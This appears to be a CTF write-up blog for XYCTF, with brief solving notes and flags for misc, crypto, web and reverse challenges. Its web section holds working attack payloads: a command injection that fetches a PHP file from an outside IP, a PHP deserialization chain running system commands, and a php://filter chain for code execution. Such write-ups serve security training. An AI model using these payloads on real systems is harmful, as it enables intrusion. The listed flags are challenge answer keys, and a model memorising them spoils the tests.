This blog only records the problem-solving process!
MISC
game
Google reverse image search
XYCTF{Papers Please}
Dr. Bear (熊博士)
XYCTF{liu_ye_mei_you_xiao_jj}
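Crazy Hodgepodge! Nine Turns to Success (疯狂大杂烩!九转功成)
In ancient times, the path of cultivation was divided into nine levels: Qi Refining, Foundation Building, Core Formation, Nascent Soul, Spirit Transformation, Void Refining, Body Integration, Mahayana, and Tribulation Crossing. Countless ambitious young people have wanted to reach that peak realm of the immortals. But for ordinary people, Qi Refining is without doubt the prerequisite for being eligible. Only by crossing the hardships step by step will you finally ascend to immortality. If you want your share of the flag, start from Qi Refining and break through slowly!! Young man, it is not that this old man looks down on you! You had better think carefully about whether you want to reach that ethereal realm of the immortals.
1. Qi Refining (炼气)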
曰:玉魔命灵天观罗炁观神冥西道地真象茫华茫空吉清荡罗命色玉凶北莽人鬼乐量西北灵色净魂地魂莽玉凶阿人梵莽西量魄周界
Tianshu (天书, 曰) decoding
First_layer_simple
After extracting the archive, repair the PNG
flag1:XYCTF{T3e_C0mb1nation_
2. Foundation Building (筑基)
xihak-minoh-zusok-humak-zurok-gulyk-somul-nenel-dalek-nusyh-zumek-sysuk-zelil-fepak-tysok-senax
BubbleBabble decoding
The_second_layer_is_also_simple
After extracting
Base64 decode
flag2:0f_crypt0_and_
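3. Core Formation (结丹)
4 intersections represent -, 3 intersections represent a space separator, 2 intersections represent .; convert to Morse code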
- .... . ..--.- - .... .. .-. -..
All lowercase: the_third
After extracting, brute-force the next zip; the password is 123456
Extract again, then Base32 decode
flag3:misc_1s_re6lly_fun!!
4. Nascent Soul (元婴)
Brute-force the PBE
The_fourth_floor_is_okay
Extract, then ROT decrypt
Decrypt the WeChat database with a script
flag4:L1u_and_K1cky_Mu
5. Spirit Transformation (化神)
enc = 'key{liu*****'
md5 = '87145027d8664fca1413e6a24ae2fbe7'
Guess that the last character is }, then brute-force the MD5
Plaintext: key{liuyyds} ---> Hash: 87145027d8664fca1413e6a24ae2fbe7
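The masked MD5 search described above, as an added example that is not the author's script. The lowercase-only alphabet is an assumption; the prefix, mask length and digest are the values quoted in the write-up.

```python
import hashlib
import itertools
import string
from typing import Optional

# Values quoted in the write-up: known prefix, five masked characters, digest.
PREFIX = "key{liu"
MASKED = 5
TARGET_MD5 = "87145027d8664fca1413e6a24ae2fbe7"


def crack_masked(prefix: str, masked: int, target_hex: str,
                 suffix: str = "}",
                 alphabet: str = string.ascii_lowercase) -> Optional[str]:
    """Search the masked positions for a string with the given MD5.

    Fixing the guessed suffix ("}") removes one unknown position, which
    divides the search space by the alphabet size. The alphabet itself is
    an assumption of this example.
    """
    unknown = masked - len(suffix)
    if unknown < 0:
        raise ValueError("suffix is longer than the masked region")
    target = bytes.fromhex(target_hex)
    for combo in itertools.product(alphabet, repeat=unknown):
        candidate = prefix + "".join(combo) + suffix
        if hashlib.md5(candidate.encode()).digest() == target:
            return candidate
    return None  # nothing in this alphabet matches


if __name__ == "__main__":
    # At most 26**4 = 456,976 candidates for the values on the page.
    print(crack_masked(PREFIX, MASKED, TARGET_MD5))
```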
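After extracting, the file name indicates Serpent encryption; decrypt it online
Download the decrypted file; it contains zero-width characters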
_3re_so_sm4rt!
6. Void Refining (炼虚)
wszrdc
fgtrfvb
ghytgbn
rfctg
yhju
frtg
uyhbghj
6yhn
uyhjujmn
tgvvghb
yhnmghj
4rfv
derf
iujkikmn
Keyboard cipher: keeponfighting
After extracting, brute-force yuanshen.jpg
In_just_a_few_m1nutes_
7. Body Integration (合体)
Ciphertext: Tig+AF8-viakubq+AF8-vphrz+AF8-xi+AF8-uayzdyrjs
Remove +AF8-
Vigenère cipher; decrypt with the key ABCDEFGHIJKLMNOPQRSTUVWXYZ
Theseventhlevelisdifficult
Fill in the underscores
The_seventh_level_is_difficult
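The level 7 password recovery in one pass, as an added example that is not the author's script. It relies on the fact that +AF8- is the UTF-7 escape for "_" (U+005F), so decoding the ciphertext as UTF-7 restores the underscores instead of stripping and re-adding them by hand; the function names are hypothetical.

```python
import string

# Ciphertext and key exactly as given in the write-up.
CIPHERTEXT = b"Tig+AF8-viakubq+AF8-vphrz+AF8-xi+AF8-uayzdyrjs"
KEY = string.ascii_uppercase  # ABCDEFGHIJKLMNOPQRSTUVWXYZ


def vigenere_decrypt(text: str, key: str) -> str:
    """Vigenere decryption that keeps case and passes non-letters through.

    The key position advances only on letters, so the underscores do not
    consume key characters.
    """
    out = []
    k = 0
    for ch in text:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = ord(key[k % len(key)].upper()) - ord("A")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


def solve_level7(raw: bytes = CIPHERTEXT, key: str = KEY) -> str:
    # UTF-7 decoding turns every "+AF8-" into "_".
    with_underscores = raw.decode("utf-7")
    return vigenere_decrypt(with_underscores, key)


if __name__ == "__main__":
    print(solve_level7())
```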
After extracting, you get an image
Assemble the numbers from the values the colors represent
164 150 145 171 137
167 145 162 145 137
164 150 162 60 165
147 150 41
Convert the octal numbers to ASCII
they_were_thr0ugh!
8. Mahayana (大乘)
b'password{pruning_algorithm}'
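After extracting, you get the text file “咦?.txt”; replace no with 0 and yes with 1, brute-force the width and height, and convert to an image
At a resolution of 548*72 the image displays correctly
Genshin Impact Teyvat Sumeru desert script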
sm3rty0ucando
9. Tribulation Crossing (渡劫)
b'game_over'
After extracting, follow the hint and read the tail of the zip file; an OutSecret signature is found
_nine_turns?}
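Concatenate the nine flag segments; following the pattern of the other 8 segments, capitalize the first letter of segment 6 and add underscores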
XYCTF{T3e_c0mb1nation_0f_crypt0_and_misc_1s_re6lly_fun!!L1u_and_K1cky_Mu_3re_so_sm4rt!In_just_a_few_m1nutes_they_were_thr0ugh!Sm3rt_y0u_can_do_nine_turns?}
After MD5
XYCTF{b1bdc6cf06a28b97c91c1c12f0d3bc00}
Why Won't My QR Code Scan? (我的二维码为啥扫不出来?)
After brute-forcing, scan each code in turn; 5_12.png scans to the flag
flag{qR_c0d3_1s_s0_fun}
Rosk,Paper,Scissors!
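Analysis of the challenge script shows that only the AI's first move is random; the remaining 99 are generated from the list of the player's own moves, so there are only three possible winning sequences against the AI, which a script can generate
First use script one to compute the rock-paper-scissors sequence
Then use a script to get the flag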
XYCTF{ROsK,p4PEr,5cI5sors_90142439eb04}
Beautiful Singing (美妙的歌声)
XYCTF{T0uch_y0ur_he3rt_d55ply!!}
ez_steganography (ez_隐写)
Extract directly with 7z and repair hint.png
XYCTF{159-WSXIJN-852}
ZIP God's Set (ZIP神之套)
CTF{1A4B8-C9D2F3E-6A4B8C-9D2F3E7F}
zzl's Little Nursing Class (zzl的护理小课堂)
XYCTF{2z1_teIl_y0U_6d2b446fd55b}
TCPL
Install QEMU
Following the hint, replace 1 with 0
FLAG{PLCT_An4_r0SCv_x0huann0}
Easter Egg? (彩蛋?)
XYCTF{this_a_bl0ckbuster_for_png_and_i_think_yon_can_find_it}
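Network Tracing (网络追踪)
Based on the characteristics of the port scan, find the ports with zero rejected sessions
Port 445 has the most packets, so consider an SMB-related CVE; look up the recent ones and try them one by one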
CVE-2017-7494
CVE-2017-11780
CVE-2018-8336
CVE-2018-0833
CVE-2020-0796
CVE-2020-1301
CVE-2022-3592
CVE-2022-3437
CVE-2023-32021
CVE-2008-4250
XYCTF{192.168.204.133_445_139_135_CVE-2008-4250}
Real > Sign-in (真>签到)
XYCTF{59bd0e77d13c_1406b23219e_f91cf3a_153e8ea4_77508ba}
Osint1
xyctf{江苏省|南通市|滨海东路|黄海}
Setting Challenges Is a Bit Annoying (出题有点烦)
XYCTF{981e5_f3ca30_c841487_830f84_fb433e}
Ez_osint
XYCTF{2fb65b60505cf6a9243661ce79431e7a}
EZ_Base1024*2
XYCTF{84ca3a6e-3508-4e34-a5e0-7d0f03084181}
Osint2
xyctf{G3293|河南省|老君山}
Crypto
x0r
XYCTF{7dff9919-f94d-41bf-bcdf-00dc4c5280c0}
Cipher in the Reverse Direction: Lovesickness (反方向的密码 相思)
XYCTF{!__d3ng__hu0__1@n__3h@n__Chu__!}
fakeRSA
sage
XYCTF{y0u_finally_f0und_t3h_s3cr3ts!!}
factor1
First use Wiener's attack (omitted) to recover d and phin, then use sage
XYCTF{a83211a70e18145a59671c08ddc67ba4}
Sign1n [sign-in], Sign1n_Revenge
The Sign1n challenge output is 10110000101100101000011010101000100011001111011001100000110010000111001001101010011011101100110001100100011000100101101001100010011010000111000001101010010110100110100011000110011000100110111001011010110001001100010001100110110011000101101011000110110010000111001001100100011010000111001001100100110001100111001011000110110000100110001011111010
It cannot be converted to a string as is, however; remove one 0 from the tail and add a 0 at the head, which gives 01011000010110010100001101010100010001100111101100110000011001000011100100110101001101110110011000110010001100010010110100110001001101000011100000110101001011010011010001100011001100010011011100101101011000100110001000110011011001100010110101100011011001000011100100110010001101000011100100110010011000110011100101100011011000010011000101111101
Converting that to a string gives the flag: XYCTF{0d957f21-1485-4c17-bb3f-cd92492c9ca1}
Likewise for the Sign1n_Revenge challenge
110011001101100011000010110011101111011001110000110001001100110011001100011000000111000001100100011011000101101011001100110001000110100001101010010110100110100001101010011010000111000001011010011100100110100011000100110001100101101001100100110010001100001001100000011100100111000001100100011011100110111011000110011000000110100011111010
flag{8bff0826-fb45-4548-94bc-2da098277c04}
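The manual step used for Sign1n and Sign1n_Revenge (drop one trailing bit, prepend it at the head) is a right rotation by one bit. The added example below, which is not the author's script, generalizes it by trying every offset from 0 to 7 and keeping the first that decodes to printable ASCII; it runs on the first 40 bits of the Sign1n_Revenge output quoted above and on a constructed sample.

```python
from typing import Optional, Tuple

# First 40 bits of the Sign1n_Revenge output quoted in the write-up.
REVENGE_PREFIX = "1100110011011000110000101100111011110110"


def bits_to_text(bits: str) -> Optional[str]:
    """Decode a bit string as 8-bit ASCII; None unless every byte is printable."""
    if not bits or len(bits) % 8:
        return None
    values = [int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)]
    if all(32 <= v < 127 for v in values):
        return bytes(values).decode("ascii")
    return None


def realign(bits: str) -> Optional[Tuple[int, str]]:
    """Rotate right by 0..7 bits; return (shift, text) for the first offset
    that yields printable ASCII, or None if no offset does."""
    n = len(bits)
    for shift in range(8):
        rotated = bits[n - shift:] + bits[:n - shift]
        text = bits_to_text(rotated)
        if text is not None:
            return shift, text
    return None


def shift_left(text: str, k: int = 1) -> str:
    """Build a constructed input: the ASCII bits of text rotated left by k."""
    bits = "".join(f"{ord(c):08b}" for c in text)
    return bits[k:] + bits[:k]


if __name__ == "__main__":
    print(realign(REVENGE_PREFIX))                     # data from the page
    print(realign(shift_left("XYCTF{constructed}")))   # constructed sample
```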
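Reborn: I Want to Be an OI Master pro (重生之我要当oi爷 pro)
Copy the sage script from the write-up for picoCTF 2024's flag_printer
After some time it finishes running and produces a very large bmp image
Zoom in on part of it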
flag{1A2Q3E71528AP49ORT}
babyRSAMAX
A mix of p-1 smooth numbers and the Rabin algorithm
XYCTF{Rabin_is_so_biggggg!}
happy_to_solve1
p and q are generated improperly; apply a ready-made script directly
XYCTF{3f22f4efe3bbbc71bbcc999a0a622a1a23303cdc}
happy_to_solve2
b'XYCTF{7f4b2241951976ce5ef6df44503209059997e5085d1bc21f6bef4d9effb29fd0}'
Random_rr
XYCTF{ba76e13f-269e-4481-baf0-4a50ad17f891}
Complex_dlp
XYCTF{___c0mp13x_d1p_15_3@5y_f0r_y0u___}
factor3
XYCTF{I_love_to_read_the_crypto_paper_and_try_to_ak_them}
easy_ecc
First convert the elliptic curve to standard form, then apply a ready-made script
XYCTF{ec9a6e17537e81b7f593f65f7e2ca5d575e6b34c504c24e4afb40c1e9dc4be0d}
Web
ezhttp
XYCTF{5c80dce9-86e5-41be-9cd9-9bbd04ebf77b}
ezmd5
XYCTF{ab1b9afe-3302-492a-9d85-8952f5633e40}
ezMake
XYCTF{5b6355d8-e03f-4c89-a445-a703a769dece}
ez?Make
XYCTF{cc0c511c-19db-4472-94a9-5b5299295706}
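Remember Well: Respect the Dead (牢牢记住,逝者为大)
Configure the attacker machine to serve PHP as plain text, so that the target machine reads the complete PHP content.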
?cmd=%0a$_GET[1];%23&1=wget%20139.224.224.1/x.php
XYCTF{50048950-1658-46ac-b17b-53e2ca190f05}
warm up
XYCTF{6b98086d-34a0-4b76-b8f2-986bed3c52e0}
I Am a Repeater (我是一个复读机)
Brute-force the password: username admin, password asdqwe
XYCTF{e2a00127-1880-457e-96d1-f3404e1ba75a}
ezRCE
Vary the form of the command being executed
XYCTF{d0acd262-dca7-40bd-aded-84b32dbb855c}
ezSerialize
XYCTF{ba62062a-0ae0-453c-857c-c045574b1837}
ezPOP
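<?php
// Local copies of the gadget classes; only the property layout is needed
// to produce the serialized string.
class AAA
{
    public $s;
    public $a = 'a';
}
class BBB
{
    public $c = '73797374656d'; // hex encoding of "system"
    public $d = 'ls';           // command; the payloads below use "ls /" and "cat /flag"
}
class CCC
{
    public $c;
}
// Chain: CCC->c = AAA, AAA->s = BBB
$a = new CCC();
$a->c = new AAA();
$a->c->s = new BBB();
$b = null;
$c = array($a, $b);
// Rewrite the second array key from 1 to 0 in the serialized string.
echo str_replace("}i:1;", "}i:0;", serialize($c));
?>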
xy=a:2:{i:0;O:3:"CCC":1:{s:1:"c";O:3:"AAA":2:{s:1:"s";O:3:"BBB":2:{s:1:"c";s:12:"73797374656d";s:1:"d";s:4:"ls /";}s:1:"a";s:1:"a";}}i:0;N;}
xy=a:2:{i:0;O:3:"CCC":1:{s:1:"c";O:3:"AAA":2:{s:1:"s";O:3:"BBB":2:{s:1:"c";s:12:"73797374656d";s:1:"d";s:9:"cat /flag";}s:1:"a";s:1:"a";}}i:0;N;}
XYCTF{285bb7af-238d-40b2-b884-188814895952}
ezClass
XXX/?a=SplFileObject&aa=/flag&&c=fgets
XYCTF{ef4f0809-f695-44d1-967f-6ac1aefe8625}
ezLFI
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO-2022-KR.UTF16|convert.iconv.ISO-
IR-139.UTF-16|convert.iconv.ISO-IR-157.ISO-IR-156|convert.iconv.WINDOWS-1258.ISO_6937|convert.iconv.KOI8-T.ISO-2022-JP-3|convert.iconv.CP874.ISO2022KR|convert.iconv.CSUNICODE.UTF-8|convert.iconv.OSF00010004.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp&0=/readflag
XYCTF{5e3f33d7-e360-4eae-9275-8425aba1ca79}
Reverse
Are You Really a College Student? (你是真的大学生吗?)
xyctf{you_know_8086}
DebugMe
XYCTF{d3bugg3r_15_v3ry_u53ful}
Meow Meow Meow's Flag Shattered All Over the Floor (喵喵喵的flag碎了一地)
flag{My_fl@g_h4s_br0ken_4parT_Bu7_Y0u_c@n_f1x_1t!}
The Clever Messenger (聪明的信使)
flag{Y0u_KnOw_Crypt0_14_v3ry_Imp0rt@nt!}
Trustme
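Extract Trustme.apk to get classes.dex and load it in jadx
When run, the apk drops shell.apk and runs it
Install and run it in the LDPlayer emulator (雷电模拟器) and locate shell.apk with MT Manager
Copy shell.apk to the PC, extract classes.dex from it, and load it in jadx
When loaded, the apk creates a database file in the databases folder
SQLite database
The flag is read from the database file
Copy the database file out of the LDPlayer emulator
Read the flag directly with a database tool: XYCTF{And0r1d_15_V3ryEasy}
Cracking Walnuts (砸核桃)
As the name suggests, the program is packed, with the Beidou (北斗) compression packer
Stack balancing; jump to the program entry point
It checks whether the input flag's length is greater than 42; if so, the input is XORed with this_is_not_flagthis_is_not_flagthis_is_no and compared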
flag{59b8ed8f-af22-11e7-bb4a-3cf862d1ee75}
baby unity
XYCTF{389f6900-e12d-4c54-a85d-64a54af9f84c}
ez_enc
flag{!_r3ea11y_w4nt_@_cu7e_s1$ter}
easy language
XYCTF{y0u_@r3_v3ry_g00d_a7_E_l@ngu@ge}
Why Must Longing Boil Away the Remaining Years (何须相思煮余年)
XYCTF{5b3e07567a9034d06851475481507a75}
What's this
XYCTF{5dcbaed781363fbfb7d8647c1aee6c}
What Year Is It Tonight (今夕是何年)
Install QEMU in Kali and run it directly
XYCTF{7e5165f1-385d-4fe9-1f2664d833a648a4}
ezmath
XYCTF{q7WYGscUuptTYXjnjKoyUTKtG}
ez_cube
Using the formula for placing the top-layer edge pieces, there are four possibilities; try them one by one:
flag{RuRURURuruRR}